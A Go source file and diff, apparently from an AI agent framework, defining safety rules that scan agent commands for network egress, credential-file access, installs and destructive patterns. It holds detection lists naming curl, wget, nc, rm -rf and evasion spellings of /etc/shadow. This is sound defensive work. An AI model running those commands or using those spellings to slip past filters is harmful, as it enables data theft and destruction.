+type hostExecRiskRule struct {
+	policy BackendPolicy
+}
+
+func (r *hostExecRiskRule) ID() string   { return "hostexec_risk" }
+func (r *hostExecRiskRule) Name() string { return "HostExec Session Risk" }
+
+func (r *hostExecRiskRule) Check(_ context.Context, req *ScanRequest) *Risk {
+	if req.Backend != BackendHostExec {
+		return nil
+	}
+
+	// If hostexec requires human review, flag as ask.
+	if r.policy.RequireHumanReview {
+		return &Risk{
+			RuleID:      r.ID(),
+			RuleName:    r.Name(),
+			Level:       RiskMedium,
+			Evidence:    "hostexec backend requires human review for all commands",
+			Suggestion:  "review the command before approving execution",
+			ShouldBlock: false,
+		}
+	}
+
+	// Background process detection.
+	lower := strings.ToLower(req.Command)
+	bgMarkers := []string{" &", "nohup ", "disown ", "setsid "}
+	for _, marker := range bgMarkers {
+		if strings.Contains(lower, marker) && !r.policy.AllowBackground {
+			return &Risk{
+				RuleID:      r.ID(),
+				RuleName:    r.Name(),
+				Level:       RiskHigh,
+				Evidence:    fmt.Sprintf("background process marker %q detected", strings.TrimSpace(marker)),
+				Suggestion:  "avoid background processes on hostexec or enable allow_background",
+				ShouldBlock: true,
+			}
+		}
+	}
+
+	return nil
+}
+
+// ----------------------------------------------------------------
+// Rule 5: Dependency install
+//
+// Detects package manager invocations (go install, npm install, pip
+// install, apt install, etc.) and flags them for review.
+// ----------------------------------------------------------------
+
+type dependencyRule struct {
+	allowed []string
+	denied  []string
+}
+
+func (r *dependencyRule) ID() string   { return "dependency_install" }
+func (r *dependencyRule) Name() string { return "Dependency Installation" }
+
+func (r *dependencyRule) Check(_ context.Context, req *ScanRequest) *Risk {
+	lower := strings.ToLower(req.Command)
+
+	installPatterns := []string{
+		"go install ", "go get ",
+		"npm install ", "npm i ", "npm add ",
+		"pip install ", "pip3 install ",
+		"apt install ", "apt-get install ",
+		"yum install ", "dnf install ",
+		"brew install ",
+	}
+
+	for _, pat := range installPatterns {
+		if strings.Contains(lower, pat) {
+			// Check if the package manager is allowed.
+			manager := strings.Fields(pat)[0]
+			if !contains(r.allowed, manager) {
+				return &Risk{
+					RuleID:      r.ID(),
+					RuleName:    r.Name(),
+					Level:       RiskHigh,
+					Evidence:    fmt.Sprintf("dependency installation via %q (not in allowed_managers)", manager),
+					Suggestion:  fmt.Sprintf("add %q to allowed_managers or install manually", manager),
+					ShouldBlock: true,
+				}
+			}
+			// Manager is allowed — check denied packages before
+			// returning the medium-risk "needs review" result.
+			if len(r.denied) > 0 {
+				pkgs := extractInstallPackages(lower, pat)
+				for _, pkg := range pkgs {
+					for _, denied := range r.denied {
+						if strings.EqualFold(pkg, strings.ToLower(denied)) {
+							return &Risk{
+								RuleID:      r.ID(),
+								RuleName:    r.Name(),
+								Level:       RiskHigh,
+								Evidence:    fmt.Sprintf("installation of denied package %q detected", denied),
+								Suggestion:  fmt.Sprintf("remove %q from the install command or allow it explicitly", denied),
+								ShouldBlock: true,
+							}
+						}
+					}
+				}
+			}
+			// Manager is allowed but still needs review.
+			return &Risk{
+				RuleID:      r.ID(),
+				RuleName:    r.Name(),
+				Level:       RiskMedium,
+				Evidence:    fmt.Sprintf("dependency installation detected: %s", truncate(req.Command, 80)),
+				Suggestion:  "review the package name and source before approving",
+				ShouldBlock: false,
+			}
+		}
+	}
+
+	return nil
+}
+
+// ----------------------------------------------------------------
+// Rule 6: Resource abuse
+//
+// Detects: long sleep, infinite loops (while true, for(;;)), and
+// other patterns that could consume resources.
+// ----------------------------------------------------------------
+
+type resourceAbuseRule struct {
+	maxSleep int
+}
+
+func (r *resourceAbuseRule) ID() string   { return "resource_abuse" }
+func (r *resourceAbuseRule) Name() string { return "Resource Abuse" }
+
+func (r *resourceAbuseRule) Check(_ context.Context, req *ScanRequest) *Risk {
+	lower := strings.ToLower(req.Command)
+
+	// Sleep duration check.  A maxSleep of 0 disables this check.
+	if r.maxSleep > 0 {
+		if dur := extractSleepSeconds(lower); dur > r.maxSleep {
+			return &Risk{
+				RuleID:      r.ID(),
+				RuleName:    r.Name(),
+				Level:       RiskHigh,
+				Evidence:    fmt.Sprintf("sleep duration %ds exceeds allowed_sleep_seconds %d", dur, r.maxSleep),
+				Suggestion:  "reduce the sleep duration or increase allowed_sleep_seconds",
+				ShouldBlock: true,
+			}
+		}
+	}
+
+	// Infinite loop patterns.
+	if strings.Contains(lower, "while true") || strings.Contains(lower, "for(;;)") || strings.Contains(lower, "for (;;)") {
+		return &Risk{
+			RuleID:      r.ID(),
+			RuleName:    r.Name(),
+			Level:       RiskHigh,
+			Evidence:    "infinite loop pattern detected",
+			Suggestion:  "add a termination condition or timeout",
+			ShouldBlock: true,
+		}
+	}
+
+	// /dev/zero (also caught by dangerous_command, but we check here
+	// for codeexec backend where shellsafe is not applied).
+	if strings.Contains(lower, "/dev/zero") {
+		return &Risk{
+			RuleID:      r.ID(),
+			RuleName:    r.Name(),
+			Level:       RiskHigh,
+			Evidence:    "access to /dev/zero (infinite stream)",
+			Suggestion:  "avoid reading from /dev/zero",
+			ShouldBlock: true,
+		}
+	}
+
+	return nil
+}
+
+// ----------------------------------------------------------------
+// Rule 7: Sensitive leak
+//
+// Detects: API keys, tokens, passwords, private keys in commands,
+// and attempts to read credential files.
+// ----------------------------------------------------------------
+
+type sensitiveLeakRule struct {
+	patterns       []*regexp.Regexp
+	forbiddenPaths []string
+}
+
+func (r *sensitiveLeakRule) ID() string   { return "sensitive_leak" }
+func (r *sensitiveLeakRule) Name() string { return "Sensitive Information Leak" }
+
+func (r *sensitiveLeakRule) Check(_ context.Context, req *ScanRequest) *Risk {
+	// Check command against sensitive patterns.
+	for _, re := range r.patterns {
+		if match := re.FindString(req.Command); match != "" {
+			return &Risk{
+				RuleID:      r.ID(),
+				RuleName:    r.Name(),
+				Level:       RiskHigh,
+				Evidence:    fmt.Sprintf("sensitive pattern matched: %s", truncate(match, 40)),
+				Suggestion:  "do not embed secrets in commands; use environment variables or config files",
+				ShouldBlock: true,
+			}
+		}
+	}
+
+	// Check for credential file access (for codeexec where shellsafe
+	// is not applied, and as a secondary check for shell backends).
+	lower := strings.ToLower(req.Command)
+	for _, fp := range r.forbiddenPaths {
+		if pathMatches(lower, fp) || pathMatches(lower, rawTildePath(fp)) {
+			return &Risk{
+				RuleID:      r.ID(),
+				RuleName:    r.Name(),
+				Level:       RiskCritical,
+				Evidence:    fmt.Sprintf("access to sensitive path %q", fp),
+				Suggestion:  "do not read credential or secret files",
+				ShouldBlock: true,
+			}
+		}
+	}
+
+	return nil
+}
+
+// ----------------------------------------------------------------
+// Rule 8: CodeExec danger
+//
+// Detects dangerous patterns in source code submitted to the
+// codeexec backend (os.system, subprocess, exec, eval in Python;
+// rm, curl, wget in bash).
+// ----------------------------------------------------------------
+
+type codeExecDangerRule struct{}
+
+func (r *codeExecDangerRule) ID() string   { return "code_exec_danger" }
+func (r *codeExecDangerRule) Name() string { return "Code Execution Danger" }
+
+func (r *codeExecDangerRule) Check(_ context.Context, req *ScanRequest) *Risk {
+	if req.Backend != BackendCodeExec {
+		return nil
+	}
+
+	lower := strings.ToLower(req.Command)
+
+	// Dangerous Python patterns.
+	dangerPatterns := []string{
+		"os.system(", "os.popen(", "subprocess.run(", "subprocess.call(",
+		"subprocess.popen(", "os.exec", "os.remove(", "os.unlink(",
+		"shutil.rmtree(",
+	}
+	for _, pat := range dangerPatterns {
+		if strings.Contains(lower, pat) {
+			return &Risk{
+				RuleID:      r.ID(),
+				RuleName:    r.Name(),
+				Level:       RiskCritical,
+				Evidence:    fmt.Sprintf("dangerous code pattern %q detected", pat),
+				Suggestion:  "avoid executing shell commands or deleting files from code",
+				ShouldBlock: true,
+			}
+		}
+	}
+
+	// Dangerous shell patterns in code.
+	shellDangers := []string{"rm -rf", "rm -r /", "curl ", "wget ", "nc ", "ssh "}
+	for _, pat := range shellDangers {
+		if strings.Contains(lower, pat) {
+			return &Risk{
+				RuleID:      r.ID(),
+				RuleName:    r.Name(),
+				Level:       RiskCritical,
+				Evidence:    fmt.Sprintf("dangerous shell pattern %q in code", pat),
+				Suggestion:  "remove shell commands from code or use safe APIs",
+				ShouldBlock: true,
+			}
+		}
+	}
+
+	return nil
+}
+
+// ----------------------------------------------------------------
+// Helpers
+// ----------------------------------------------------------------
+
+func compilePatterns(patterns []string) ([]*regexp.Regexp, error) {
+	compiled := make([]*regexp.Regexp, 0, len(patterns))
+	for _, p := range patterns {
+		re, err := regexp.Compile(p)
+		if err != nil {
+			return nil, fmt.Errorf("pattern %q: %w", p, err)
+		}
+		compiled = append(compiled, re)
+	}
+	return compiled, nil
+}
+
+func expandPaths(paths []string) []string {
+	out := make([]string, 0, len(paths))
+	for _, p := range paths {
+		out = append(out, expandTilde(p))
+	}
+	return out
+}
+
+func expandTilde(p string) string {
+	return strings.ReplaceAll(p, "~", getHomeDir())
+}
+
+func getHomeDir() string {
+	home, err := os.UserHomeDir()
+	if err != nil {
+		return "/root"
+	}
+	return home
+}
+
+func toLowerSlice(in []string) []string {
+	out := make([]string, 0, len(in))
+	for _, s := range in {
+		out = append(out, strings.ToLower(s))
+	}
+	return out
+}
+
+func contains(slice []string, s string) bool {
+	for _, v := range slice {
+		if v == s {
+			return true
+		}
+	}
+	return false
+}
+
+func truncate(s string, n int) string {
+	if len(s) <= n {
+		return s
+	}
+	return s[:n] + "..."
+}
+
+// extractInstallPackages returns the package name tokens found in cmd
+// after the install pattern, stripping version specifiers (==, >=, @,
+// etc.) and skipping flags (tokens starting with -).
+func extractInstallPackages(cmd, pattern string) []string {
+	idx := strings.Index(cmd, pattern)
+	if idx < 0 {
+		return nil
+	}
+	rest := cmd[idx+len(pattern):]
+	var pkgs []string
+	for _, tok := range strings.Fields(rest) {
+		if strings.HasPrefix(tok, "-") {
+			continue
+		}
+		pkg := stripVersionSpecifier(tok)
+		if pkg != "" {
+			pkgs = append(pkgs, pkg)
+		}
+	}
+	return pkgs
+}
+
+// stripVersionSpecifier removes version qualifiers from a package
+// token (e.g. "pkg==1.0" → "pkg") and lower-cases the result.
+func stripVersionSpecifier(pkg string) string {
+	for _, sep := range []string{"==", ">=", "<=", "~=", "@", ">", "<"} {
+		if idx := strings.Index(pkg, sep); idx >= 0 {
+			pkg = pkg[:idx]
+		}
+	}
+	return strings.ToLower(pkg)
+}
+
+// extractSleepSeconds parses "sleep N" (or "sleep Ns", "sleep Nm",
+// "sleep Nh") from cmd and returns the duration in seconds.  Returns
+// 0 if no sleep command is found.
+func extractSleepSeconds(cmd string) int {
+	re := regexp.MustCompile(`(?:^|\s)sleep\s+(\d+)([smhd]?)`)
+	m := re.FindStringSubmatch(cmd)
+	if m == nil {
+		return 0
+	}
+	n, err := strconv.Atoi(m[1])
+	if err != nil {
+		return 0
+	}
+	switch m[2] {
+	case "m":
+		n *= 60
+	case "h":
+		n *= 3600
+	case "d":
+		n *= 86400
+	}
+	return n
+}

--- a/tool/safety/rules.go
+++ b/tool/safety/rules.go
@@ -12,9 +12,12 @@ import (
 	"context"
 	"fmt"
 	"os"
+	"path/filepath"
 	"regexp"
 	"strconv"
 	"strings"
+
+	"trpc.group/trpc-go/trpc-agent-go/internal/shellsafe"
 )
 
 // defaultRules returns the rule set covering all seven risk categories.
@@ -24,14 +27,17 @@ func defaultRules(p *Policy) ([]Rule, error) {
 		return nil, fmt.Errorf("compile sensitive patterns: %w", err)
 	}
 
-	forbiddenPaths := expandPaths(p.ForbiddenPaths)
+	forbiddenPaths, err := buildForbiddenPaths(p.ForbiddenPaths)
+	if err != nil {
+		return nil, fmt.Errorf("build forbidden paths: %w", err)
+	}
 	networkWhitelist := toLowerSlice(p.NetworkWhitelist)
 
 	return []Rule{
 		&dangerousCommandRule{forbiddenPaths: forbiddenPaths},
 		&networkEgressRule{whitelist: networkWhitelist},
 		&shellBypassRule{},
-		&hostExecRiskRule{policy: p.BackendPolicies.HostExec},
+		&hostExecRiskRule{policies: p.BackendPolicies},
 		&dependencyRule{allowed: p.DependencyPolicy.AllowedManagers, denied: p.DependencyPolicy.DeniedPackages},
 		&resourceAbuseRule{maxSleep: p.ResourceLimits.AllowedSleepSeconds},
 		&sensitiveLeakRule{patterns: sensitivePatterns, forbiddenPaths: forbiddenPaths},
@@ -50,7 +56,7 @@ func defaultRules(p *Policy) ([]Rule, error) {
 // ----------------------------------------------------------------
 
 type dangerousCommandRule struct {
-	forbiddenPaths []string
+	forbiddenPaths []forbiddenPath
 }
 
 func (r *dangerousCommandRule) ID() string   { return "dangerous_command" }
@@ -72,19 +78,19 @@ func (r *dangerousCommandRule) Check(_ context.Context, req *ScanRequest) *Risk 
 		}
 	}
 
-	// Forbidden path access.  Check both the expanded path (e.g.
-	// /Users/x/.ssh) and the raw tilde form (~/.ssh) so commands
-	// using the tilde shorthand are caught too.
-	for _, fp := range r.forbiddenPaths {
-		if pathMatches(cmd, fp) || pathMatches(cmd, rawTildePath(fp)) {
-			return &Risk{
-				RuleID:      r.ID(),
-				RuleName:    r.Name(),
-				Level:       RiskCritical,
-				Evidence:    fmt.Sprintf("access to forbidden path %q detected", fp),
-				Suggestion:  "do not read or write credential, secret, or system files",
-				ShouldBlock: true,
-			}
+	// Forbidden path access.  Matching operates on the parsed argv with
+	// each path argument normalized (quote-stripping, filepath.Clean and
+	// tilde expansion), never on raw substrings of the command text, so
+	// shell-equivalent spellings like /etc/"shadow", /etc//shadow and
+	// /etc/../etc/shadow are all caught by a configured /etc/shadow.
+	if fp := matchForbidden(req, r.forbiddenPaths); fp != "" {
+		return &Risk{
+			RuleID:      r.ID(),
+			RuleName:    r.Name(),
+			Level:       RiskCritical,
+			Evidence:    fmt.Sprintf("access to forbidden path %q detected", fp),
+			Suggestion:  "do not read or write credential, secret, or system files",
+			ShouldBlock: true,
 		}
 	}
 
@@ -101,28 +107,6 @@ func (r *dangerousCommandRule) Check(_ context.Context, req *ScanRequest) *Risk 
 	}
 
 	return nil
-}
-
-// rawTildePath converts an expanded path back to its tilde form so
-// commands using ~/.ssh are matched even when the forbidden path was
-// expanded to /Users/x/.ssh.
-func rawTildePath(expanded string) string {
-	home := getHomeDir()
-	if home != "" && strings.HasPrefix(expanded, home) {
-		return "~" + expanded[len(home):]
-	}
-	return expanded
-}
-
-// pathMatches checks whether cmd references a forbidden path. The
-// forbidden path may be a glob pattern (* is treated as wildcard).
-func pathMatches(cmd, forbidden string) bool {
-	// Expand wildcards: "*.env" → check if cmd contains ".env".
-	if strings.Contains(forbidden, "*") {
-		stripped := strings.ReplaceAll(forbidden, "*", "")
-		return strings.Contains(strings.ToLower(cmd), strings.ToLower(stripped))
-	}
-	return strings.Contains(strings.ToLower(cmd), strings.ToLower(forbidden))
 }
 
 // ----------------------------------------------------------------
@@ -146,7 +130,8 @@ func (r *networkEgressRule) Check(_ context.Context, req *ScanRequest) *Risk {
 	cmd := req.Command
 	lower := strings.ToLower(cmd)
 
-	// Extract URLs from the command.
+	// Extract URLs from the command.  This covers any command, including
+	// interpreters that embed a URL in an argument (python, ruby, ...).
 	urls := extractURLs(lower)
 	for _, u := range urls {
 		host := extractHost(u)
@@ -154,14 +139,18 @@ func (r *networkEgressRule) Check(_ context.Context, req *ScanRequest) *Risk {
 			continue
 		}
 		if !isWhitelisted(host, r.whitelist) {
-			return &Risk{
-				RuleID:      r.ID(),
-				RuleName:    r.Name(),
-				Level:       RiskCritical,
-				Evidence:    fmt.Sprintf("network egress to non-whitelisted host %q", host),
-				Suggestion:  fmt.Sprintf("add %q to network_whitelist or use a whitelisted host", host),
-				ShouldBlock: true,
-			}
+			return egressRisk(r, host)
+		}
+	}
+
+	// Extract scheme-less host arguments from known network-capable
+	// commands (curl, wget) and package managers (go get / go install,
+	// pip install, npm install).  A scheme-less host is matched against
+	// the whitelist just like a URL host, so an explicitly whitelisted
+	// host passes here instead of falling through to the policy default.
+	for _, host := range extractSchemelessHosts(cmd, req.Backend) {
+		if !isWhitelisted(host, r.whitelist) {
+			return egressRisk(r, host)
 		}
 	}
 
@@ -220,6 +209,117 @@ func isWhitelisted(host string, whitelist []string) bool {
 	return false
 }
 
+// egressRisk is the risk returned when a command targets a host that is
+// not in the network whitelist.
+func egressRisk(r *networkEgressRule, host string) *Risk {
+	return &Risk{
+		RuleID:      r.ID(),
+		RuleName:    r.Name(),
+		Level:       RiskCritical,
+		Evidence:    fmt.Sprintf("network egress to non-whitelisted host %q", host),
+		Suggestion:  fmt.Sprintf("add %q to network_whitelist or use a whitelisted host", host),
+		ShouldBlock: true,
+	}
+}
+
+// extractSchemelessHosts returns the lower-cased hosts that cmd targets
+// through a network-capable command without a URL scheme.  It inspects
+// the parsed argv so quote-stripping matches the rest of the rule set.
+//
+// Only commands that consume a host / package target positionally are
+// inspected, so an arbitrary command's ordinary arguments (file names,
+// local paths) are never mistaken for a host.  A target is treated as a
+// host only when its first path segment looks like a domain (contains a
+// dot), which prevents a bare package name such as "pip install requests"
+// from being flagged as egress.
+func extractSchemelessHosts(cmd string, backend Backend) []string {
+	args := commandArgs(cmd, backend)
+	if len(args) == 0 {
+		return nil
+	}
+	targetIdx := hostTargetIndex(args)
+	if targetIdx < 0 {
+		return nil
+	}
+	var hosts []string
+	for _, arg := range args[targetIdx:] {
+		if arg == "" || strings.HasPrefix(arg, "-") {
+			continue
+		}
+		if h := hostFromTarget(arg); h != "" {
+			hosts = append(hosts, h)
+		}
+	}
+	return hosts
+}
+
+// hostTargetIndex returns the argv index at which host-bearing targets
+// begin for the leading command, or -1 when the command is not a
+// recognized network client or package manager.  The leading command is
+// matched on its basename so "/usr/bin/curl ..." is recognized the same
+// as "curl ...".
+func hostTargetIndex(args []string) int {
+	cmd := basename(strings.ToLower(args[0]))
+	switch cmd {
+	case "curl", "wget":
+		return 1
+	case "go":
+		if len(args) >= 2 {
+			switch strings.ToLower(args[1]) {
+			case "get", "install":
+				return 2
+			}
+		}
+	case "pip", "pip3", "pipenv":
+		if len(args) >= 2 && strings.ToLower(args[1]) == "install" {
+			return 2
+		}
+	case "npm", "pnpm", "yarn":
+		if len(args) >= 2 {
+			switch strings.ToLower(args[1]) {
+			case "install", "i", "add":
+				return 2
+			}
+		}
+	}
+	return -1
+}
+
+// hostFromTarget extracts a hostname from a target argument, handling
+// both scheme-ful URLs and scheme-less hosts.  It returns "" when the
+// target does not carry a recognizable host, so ordinary package names
+// and local arguments are not treated as egress targets.
+func hostFromTarget(arg string) string {
+	arg = strings.ToLower(arg)
+	// Scheme-ful URL: delegate to the existing host extractor.
+	if strings.HasPrefix(arg, "http://") || strings.HasPrefix(arg, "https://") {
+		return extractHost(arg)
+	}
+	// Scheme-less: take the first path segment, dropping any version
+	// specifier (@v1.0), userinfo, or port that follows.
+	host := arg
+	if i := strings.IndexAny(host, "/:@"); i >= 0 {
+		host = host[:i]
+	}
+	if host == "" {
+		return ""
+	}
+	// Only a segment that looks like a domain is a host candidate; a
+	// bare word such as "requests" is not.
+	if !strings.Contains(host, ".") {
+		return ""
+	}
+	return host
+}
+
+// basename returns the final path element of name, lower-cased.
+func basename(name string) string {
+	if i := strings.LastIndexAny(name, "/\\"); i >= 0 {
+		return name[i+1:]
+	}
+	return name
+}
+
 // ----------------------------------------------------------------
 // Rule 3: Shell bypass
 //
@@ -257,26 +357,46 @@ func (r *shellBypassRule) Check(_ context.Context, req *ScanRequest) *Risk {
 // ----------------------------------------------------------------
 // Rule 4: Hostexec risk
 //
-// Detects risks specific to hostexec: privilege escalation (sudo/su
-// are in shellsafe implicit deny, but we double-check), background
-// processes, and long sessions.  Also enforces the
+// Detects risks specific to the hostexec and workspaceexec backends:
+// background processes and long-running sessions.  Also enforces the
 // RequireHumanReview policy for hostexec.
+//
+// Background detection is driven by the structured "background" boolean
+// that both backends expose in their argument shape.  A request carrying
+// background: true is denied when allow_background is false, regardless of
+// whether the command text contains a background marker.  This closes the
+// bypass where background: true plus a command with no textual marker
+// slipped past allow_background: false.  The textual markers ("&",
+// "nohup", "disown", "setsid") remain a fallback for the direct
+// ScanCommand path, where no structured argument is available.
 // ----------------------------------------------------------------
 
 type hostExecRiskRule struct {
-	policy BackendPolicy
+	policies BackendPolicies
 }
 
 func (r *hostExecRiskRule) ID() string   { return "hostexec_risk" }
 func (r *hostExecRiskRule) Name() string { return "HostExec Session Risk" }
 
+// policyFor returns the per-backend policy that applies to req.Backend.
+// Both hostexec and workspaceexec are governed by their own BackendPolicy;
+// the rule selects the matching one so allow_background and
+// require_human_review are honored per backend.
+func (r *hostExecRiskRule) policyFor(req *ScanRequest) BackendPolicy {
+	if req.Backend == BackendWorkspaceExec {
+		return r.policies.WorkspaceExec
+	}
+	return r.policies.HostExec
+}
+
 func (r *hostExecRiskRule) Check(_ context.Context, req *ScanRequest) *Risk {
-	if req.Backend != BackendHostExec {
+	if req.Backend != BackendHostExec && req.Backend != BackendWorkspaceExec {
 		return nil
 	}
+	policy := r.policyFor(req)
 
-	// If hostexec requires human review, flag as ask.
-	if r.policy.RequireHumanReview {
+	// If the backend requires human review, flag as ask.
+	if policy.RequireHumanReview {
 		return &Risk{
 			RuleID:      r.ID(),
 			RuleName:    r.Name(),
@@ -287,17 +407,37 @@ func (r *hostExecRiskRule) Check(_ context.Context, req *ScanRequest) *Risk {
 		}
 	}
 
-	// Background process detection.
+	if policy.AllowBackground {
+		return nil
+	}
+
+	// Structured "background" flag: authoritative.  The adapter reads it
+	// from the tool's JSON arguments, so a background:true request with a
+	// clean command string is still caught here.
+	if req.Background {
+		return &Risk{
+			RuleID:      r.ID(),
+			RuleName:    r.Name(),
+			Level:       RiskHigh,
+			Evidence:    "background process requested via 'background': true",
+			Suggestion:  "avoid background processes or enable allow_background",
+			ShouldBlock: true,
+		}
+	}
+
+	// Textual fallback for the direct ScanCommand path (no structured
+	// argument): a command that textually requests background execution is
+	// still a background risk.
 	lower := strings.ToLower(req.Command)
 	bgMarkers := []string{" &", "nohup ", "disown ", "setsid "}
 	for _, marker := range bgMarkers {
-		if strings.Contains(lower, marker) && !r.policy.AllowBackground {
+		if strings.Contains(lower, marker) {
 			return &Risk{
 				RuleID:      r.ID(),
 				RuleName:    r.Name(),
 				Level:       RiskHigh,
 				Evidence:    fmt.Sprintf("background process marker %q detected", strings.TrimSpace(marker)),
-				Suggestion:  "avoid background processes on hostexec or enable allow_background",
+				Suggestion:  "avoid background processes or enable allow_background",
 				ShouldBlock: true,
 			}
 		}
@@ -322,63 +462,59 @@ func (r *dependencyRule) ID() string   { return "dependency_install" }
 func (r *dependencyRule) Name() string { return "Dependency Installation" }
 
 func (r *dependencyRule) Check(_ context.Context, req *ScanRequest) *Risk {
-	lower := strings.ToLower(req.Command)
-
-	installPatterns := []string{
-		"go install ", "go get ",
-		"npm install ", "npm i ", "npm add ",
-		"pip install ", "pip3 install ",
-		"apt install ", "apt-get install ",
-		"yum install ", "dnf install ",
-		"brew install ",
+	// Match on the parsed argv (executable basename + subcommand) rather
+	// than a raw single-space substring of the command text, so
+	// shell-equivalent spellings like "pip  install" (double space) and
+	// "pip\tinstall" (tab) are detected the same as "pip install".  This
+	// also guards against over-broad detection: "echo pip install ..."
+	// has echo as its executable and is not an install.
+	args := commandArgs(req.Command, req.Backend)
+	if len(args) < 2 {
+		return nil
+	}
+	manager := basename(strings.ToLower(args[0]))
+	if !isInstallSubcommand(manager, strings.ToLower(args[1])) {
+		return nil
 	}
 
-	for _, pat := range installPatterns {
-		if strings.Contains(lower, pat) {
-			// Check if the package manager is allowed.
-			manager := strings.Fields(pat)[0]
-			if !contains(r.allowed, manager) {
-				return &Risk{
-					RuleID:      r.ID(),
-					RuleName:    r.Name(),
-					Level:       RiskHigh,
-					Evidence:    fmt.Sprintf("dependency installation via %q (not in allowed_managers)", manager),
-					Suggestion:  fmt.Sprintf("add %q to allowed_managers or install manually", manager),
-					ShouldBlock: true,
-				}
-			}
-			// Manager is allowed — check denied packages before
-			// returning the medium-risk "needs review" result.
-			if len(r.denied) > 0 {
-				pkgs := extractInstallPackages(lower, pat)
-				for _, pkg := range pkgs {
-					for _, denied := range r.denied {
-						if strings.EqualFold(pkg, strings.ToLower(denied)) {
-							return &Risk{
-								RuleID:      r.ID(),
-								RuleName:    r.Name(),
-								Level:       RiskHigh,
-								Evidence:    fmt.Sprintf("installation of denied package %q detected", denied),
-								Suggestion:  fmt.Sprintf("remove %q from the install command or allow it explicitly", denied),
-								ShouldBlock: true,
-							}
-						}
+	// Check if the package manager is allowed.
+	if !contains(r.allowed, manager) {
+		return &Risk{
+			RuleID:      r.ID(),
+			RuleName:    r.Name(),
+			Level:       RiskHigh,
+			Evidence:    fmt.Sprintf("dependency installation via %q (not in allowed_managers)", manager),
+			Suggestion:  fmt.Sprintf("add %q to allowed_managers or install manually", manager),
+			ShouldBlock: true,
+		}
+	}
+	// Manager is allowed — check denied packages before returning the
+	// medium-risk "needs review" result.
+	if len(r.denied) > 0 {
+		for _, pkg := range installPackages(args[2:]) {
+			for _, denied := range r.denied {
+				if strings.EqualFold(pkg, strings.ToLower(denied)) {
+					return &Risk{
+						RuleID:      r.ID(),
+						RuleName:    r.Name(),
+						Level:       RiskHigh,
+						Evidence:    fmt.Sprintf("installation of denied package %q detected", denied),
+						Suggestion:  fmt.Sprintf("remove %q from the install command or allow it explicitly", denied),
+						ShouldBlock: true,
 					}
 				}
 			}
-			// Manager is allowed but still needs review.
-			return &Risk{
-				RuleID:      r.ID(),
-				RuleName:    r.Name(),
-				Level:       RiskMedium,
-				Evidence:    fmt.Sprintf("dependency installation detected: %s", truncate(req.Command, 80)),
-				Suggestion:  "review the package name and source before approving",
-				ShouldBlock: false,
-			}
 		}
 	}
-
-	return nil
+	// Manager is allowed but still needs review.
+	return &Risk{
+		RuleID:      r.ID(),
+		RuleName:    r.Name(),
+		Level:       RiskMedium,
+		Evidence:    fmt.Sprintf("dependency installation detected: %s", truncate(req.Command, 80)),
+		Suggestion:  "review the package name and source before approving",
+		ShouldBlock: false,
+	}
 }
 
 // ----------------------------------------------------------------
@@ -449,21 +585,25 @@ func (r *resourceAbuseRule) Check(_ context.Context, req *ScanRequest) *Risk {
 
 type sensitiveLeakRule struct {
 	patterns       []*regexp.Regexp
-	forbiddenPaths []string
+	forbiddenPaths []forbiddenPath
 }
 
 func (r *sensitiveLeakRule) ID() string   { return "sensitive_leak" }
 func (r *sensitiveLeakRule) Name() string { return "Sensitive Information Leak" }
 
 func (r *sensitiveLeakRule) Check(_ context.Context, req *ScanRequest) *Risk {
-	// Check command against sensitive patterns.
+	// Check command against sensitive patterns.  The evidence is a
+	// generic description rather than the matched bytes so the secret
+	// itself is never echoed into the report, the recommendation, or the
+	// model-visible permission decision.  We only need to know a secret
+	// was present, not what it was.
 	for _, re := range r.patterns {
-		if match := re.FindString(req.Command); match != "" {
+		if re.MatchString(req.Command) {
 			return &Risk{
 				RuleID:      r.ID(),
 				RuleName:    r.Name(),
 				Level:       RiskHigh,
-				Evidence:    fmt.Sprintf("sensitive pattern matched: %s", truncate(match, 40)),
+				Evidence:    "matched sensitive pattern (e.g. API key, token, or password)",
 				Suggestion:  "do not embed secrets in commands; use environment variables or config files",
 				ShouldBlock: true,
 			}
@@ -472,17 +612,16 @@ func (r *sensitiveLeakRule) Check(_ context.Context, req *ScanRequest) *Risk {
 
 	// Check for credential file access (for codeexec where shellsafe
 	// is not applied, and as a secondary check for shell backends).
-	lower := strings.ToLower(req.Command)
-	for _, fp := range r.forbiddenPaths {
-		if pathMatches(lower, fp) || pathMatches(lower, rawTildePath(fp)) {
-			return &Risk{
-				RuleID:      r.ID(),
-				RuleName:    r.Name(),
-				Level:       RiskCritical,
-				Evidence:    fmt.Sprintf("access to sensitive path %q", fp),
-				Suggestion:  "do not read credential or secret files",
-				ShouldBlock: true,
-			}
+	// Matching uses the same normalized-argv semantics as the
+	// dangerous_command rule.
+	if fp := matchForbidden(req, r.forbiddenPaths); fp != "" {
+		return &Risk{
+			RuleID:      r.ID(),
+			RuleName:    r.Name(),
+			Level:       RiskCritical,
+			Evidence:    fmt.Sprintf("access to sensitive path %q", fp),
+			Suggestion:  "do not read credential or secret files",
+			ShouldBlock: true,
 		}
 	}
 
@@ -562,12 +701,127 @@ func compilePatterns(patterns []string) ([]*regexp.Regexp, error) {
 	return compiled, nil
 }
 
-func expandPaths(paths []string) []string {
-	out := make([]string, 0, len(paths))
+// forbiddenPath is a compiled forbidden-path entry.  Non-glob entries are
+// compared against normalized command arguments as exact paths or as a
+// parent directory; glob entries (those containing '*') are matched against
+// the whole normalized argument, where '*' spans path separators so
+// "*.env" matches "config/app.env" and "/secret/*/key" matches
+// "/secret/user/key".
+type forbiddenPath struct {
+	pattern string         // normalized path or glob pattern
+	glob    *regexp.Regexp // compiled glob matcher, nil when pattern has no '*'
+}
+
+// buildForbiddenPaths expands "~" and cleans each configured forbidden path,
+// compiling any glob patterns up front so the per-request scan only performs
+// cheap regexp matches.
+func buildForbiddenPaths(paths []string) ([]forbiddenPath, error) {
+	fps := make([]forbiddenPath, 0, len(paths))
 	for _, p := range paths {
-		out = append(out, expandTilde(p))
+		norm := normalizePath(p)
+		fp := forbiddenPath{pattern: norm}
+		if strings.Contains(norm, "*") {
+			re, err := globToRegexp(norm)
+			if err != nil {
+				return nil, fmt.Errorf("compile forbidden path %q: %w", p, err)
+			}
+			fp.glob = re
+		}
+		fps = append(fps, fp)
 	}
-	return out
+	return fps, nil
+}
+
+// matchForbidden returns the pattern of the first forbidden path that the
+// request's command references, or "" if none.  Matching operates on the
+// parsed argv (quotes stripped by shellsafe) with each path argument
+// normalized via normalizePath, never on raw substrings of the command text.
+func matchForbidden(req *ScanRequest, forbidden []forbiddenPath) string {
+	args := commandArgs(req.Command, req.Backend)
+	for _, fp := range forbidden {
+		for _, arg := range args {
+			if matchForbiddenArg(normalizePath(arg), fp) {
